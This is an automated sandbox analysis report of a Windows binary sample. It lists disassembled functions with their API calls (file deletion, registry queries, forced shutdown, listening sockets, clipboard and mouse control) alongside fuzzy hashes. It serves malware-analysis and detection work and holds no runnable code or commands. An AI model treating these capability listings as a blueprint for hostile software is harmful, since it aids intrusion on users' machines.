                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009596FA
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0095974A
                                                                    • SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 00959768
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00959772
                                                                    • FindClose.KERNEL32(00000000), ref: 0095977F
                                                                    • FindClose.KERNEL32(00000000), ref: 0095978F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
                                                                    • Instruction ID: 61c15a592e8d60cc891b812a3733ed554f0df105fecf5787d3edd42ab2b228c2
                                                                    • Opcode Fuzzy Hash: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
                                                                    • Instruction Fuzzy Hash: 3D311772505209AEEF10EFB5EC08ADE37AC9F49321F14405AFC18E2190DB30DE888F60
                                                                    Function 0095979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009597BE
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00959819
                                                                    • FindClose.KERNEL32(00000000), ref: 00959824
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00959840
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00959890
                                                                    • SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 009598AE
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009598B8
                                                                    • FindClose.KERNEL32(00000000), ref: 009598C5
                                                                    • FindClose.KERNEL32(00000000), ref: 009598D5
                                                                      • Part of subcall function 0094DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0094DB00
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
                                                                    • Instruction ID: 1257e51883a36b248935a73b589cce0ecf9f4c96ab5c2d0f26f4b80fb805df6b
                                                                    • Opcode Fuzzy Hash: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
                                                                    • Instruction Fuzzy Hash: 7131F272505219AEEF10EFB5EC48ADE37ACDF46325F144169ED18A21D0DB30DA88DB60
                                                                    Function 0096BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BF3E
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0096BFA9
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096BFCD
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0096C02C
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0096C0E7
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0096C154
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0096C1E9
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0096C23A
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0096C2E3
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096C382
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096C38F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3102970594-0
                                                                    • Opcode ID: e3d3ebaf9c26f8c79d123025a70c8f0b1987b948a650772a5cf965190f23d14a
                                                                    • Instruction ID: 1ecb53039ad652cecace156bfce261b038401b4b25e9819ec0497bc04eb89ba9
                                                                    • Opcode Fuzzy Hash: e3d3ebaf9c26f8c79d123025a70c8f0b1987b948a650772a5cf965190f23d14a
                                                                    • Instruction Fuzzy Hash: ED024EB16042409FD714DF28C895E2ABBE9FF89314F18849DF889CB2A2D731ED45CB52
                                                                    Function 00958195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00958257
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00958267
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00958273
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00958310
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958324
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958356
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095838C
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00958395
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                    • String ID: *.*
                                                                    • API String ID: 1464919966-438819550
                                                                    • Opcode ID: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
                                                                    • Instruction ID: fe86fd0136d3b3caff69ae62a39e36bc13888ff4eec0f2cffc49f6b1955d1b1c
                                                                    • Opcode Fuzzy Hash: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
                                                                    • Instruction Fuzzy Hash: 166148B25082459FCB10EF65C841AAFB3E8FF89311F04891DF999D7251EB31E949CB92
                                                                    Function 0094D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                      • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0094D122
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0094D1DD
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0094D1F0
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D20D
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D237
                                                                      • Part of subcall function 0094D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0094D21C,?,?), ref: 0094D2B2
                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0094D253
                                                                    • FindClose.KERNEL32(00000000), ref: 0094D264
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 1946585618-1173974218
                                                                    • Opcode ID: 56e7ccfd4604ca7d6317e1eb2eeca26aedf71a221eac68d2e049f5ea17420c00
                                                                    • Instruction ID: 9aa138841782d6cb4f6b09ad55bbc5772ccfb941b4e7981522fe7390f99076ba
                                                                    • Opcode Fuzzy Hash: 56e7ccfd4604ca7d6317e1eb2eeca26aedf71a221eac68d2e049f5ea17420c00
                                                                    • Instruction Fuzzy Hash: 32619C3180614DABCF15EBA5C992DEDB7B9FF56300F204069E411B31A2EB70AF49CB61
                                                                    Function 0095ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
                                                                    • Instruction ID: 8ae45932bf481318f40f3bb625d5550797d6e12853f80dbf6385ffd365c7a9c9
                                                                    • Opcode Fuzzy Hash: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
                                                                    • Instruction Fuzzy Hash: 694103716182119FD714CF16D889F19BBE4FF44319F04C09DE8298B6A2C736ED85CB80
                                                                    Function 0094E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                      • Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                      • Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 0094E932
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-3163812486
                                                                    • Opcode ID: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
                                                                    • Instruction ID: d274e782141dea60f94e6ab9bbc07305002e33046d14ea4f7fa461e5ed0b6a96
                                                                    • Opcode Fuzzy Hash: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
                                                                    • Instruction Fuzzy Hash: A401F973725211AFEB6426B49C86FBF729CB754790F150825FC13E21D2D6A59C809294
                                                                    Function 00961204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00961276
                                                                    • WSAGetLastError.WSOCK32 ref: 00961283
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 009612BA
                                                                    • WSAGetLastError.WSOCK32 ref: 009612C5
                                                                    • closesocket.WSOCK32(00000000), ref: 009612F4
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00961303
                                                                    • WSAGetLastError.WSOCK32 ref: 0096130D
                                                                    • closesocket.WSOCK32(00000000), ref: 0096133C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                    • String ID:
                                                                    • API String ID: 540024437-0
                                                                    • Opcode ID: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
                                                                    • Instruction ID: d2a99820dc33a1f673082c0d6aa6f471ecb61fa5986a9fabbc31465667e22e4d
                                                                    • Opcode Fuzzy Hash: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
                                                                    • Instruction Fuzzy Hash: 7C417F71A001409FD710DF68C498B6ABBE5BF46318F1C819CE8669F296C771ED81CBA1
                                                                    Function 0094D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                      • Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0094D420
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D470
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D481
                                                                    • FindClose.KERNEL32(00000000), ref: 0094D498
                                                                    • FindClose.KERNEL32(00000000), ref: 0094D4A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
                                                                    • Instruction ID: 50434544baeb9c51cf99fe93bc52002787ac491f0ae9e212c3912401189d3442
                                                                    • Opcode Fuzzy Hash: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
                                                                    • Instruction Fuzzy Hash: 68316F7101D3819BC204EF69D8958AF77ACFE92304F444A2DF4E5931A1EB20EA49D763
                                                                    Function 0091E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
                                                                    • Instruction ID: 27b16bb383390d24e718a71fc6f18111578f19e1709c111dc521114cffeca59a
                                                                    • Opcode Fuzzy Hash: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
                                                                    • Instruction Fuzzy Hash: 7EC22C71E0862D8FDB25CE289D547E9B7B9EB44344F1445EAD84EE7280E778AEC18F40
                                                                    Function 0095648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 009564DC
                                                                    • CoInitialize.OLE32(00000000), ref: 00956639
                                                                    • CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 00956650
                                                                    • CoUninitialize.OLE32 ref: 009568D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: c4427b0a7a6cbe937103486bf015279f9621bc1abeb09b8120e4344350ce6fad
                                                                    • Instruction ID: 397ed81502e97f2b979c4233448752e423a5a47b29b6bc724da891ca3d410133
                                                                    • Opcode Fuzzy Hash: c4427b0a7a6cbe937103486bf015279f9621bc1abeb09b8120e4344350ce6fad
                                                                    • Instruction Fuzzy Hash: 1FD159715082419FC314EF29C881A6BB7E8FF95704F50496DF595CB2A1EB70EE0ACB92
                                                                    Function 009622DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 009622E8
                                                                      • Part of subcall function 0095E4EC: GetWindowRect.USER32(?,?), ref: 0095E504
                                                                    • GetDesktopWindow.USER32 ref: 00962312
                                                                    • GetWindowRect.USER32(00000000), ref: 00962319
                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00962355
                                                                    • GetCursorPos.USER32(?), ref: 00962381
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009623DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                    • String ID:
                                                                    • API String ID: 2387181109-0
                                                                    • Opcode ID: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
                                                                    • Instruction ID: 9771fcf244d5be404067d9ed49e834b52b4d78e5005956b0d14617662f77cf31
                                                                    • Opcode Fuzzy Hash: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
                                                                    • Instruction Fuzzy Hash: 1E31EE72509715AFC720DF54C849F9BBBA9FF88710F000A1DF98997291DB35EA48CB92
                                                                    Function 00959B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00959B78
                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00959C8B
                                                                      • Part of subcall function 00953874: GetInputState.USER32 ref: 009538CB
                                                                      • Part of subcall function 00953874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966
                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00959BA8
                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00959C75
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                    • String ID: *.*
                                                                    • API String ID: 1972594611-438819550
                                                                    • Opcode ID: 4148e0e43a8646cfdffd3de0c734c953552749abd19844ad665983cfa6681f38
                                                                    • Instruction ID: da41799bfb3761c644eb4cc00647eccc42db7be7fe6a5127264690f42e931ae1
                                                                    • Opcode Fuzzy Hash: 4148e0e43a8646cfdffd3de0c734c953552749abd19844ad665983cfa6681f38
                                                                    • Instruction Fuzzy Hash: D5416171904209EFDF14DF69D845AEE7BB8FF45311F244055E859A2191EB309E88CF61
                                                                    Function 008F997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 008F9A4E
                                                                    • GetSysColor.USER32(0000000F), ref: 008F9B23
                                                                    • SetBkColor.GDI32(?,00000000), ref: 008F9B36
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
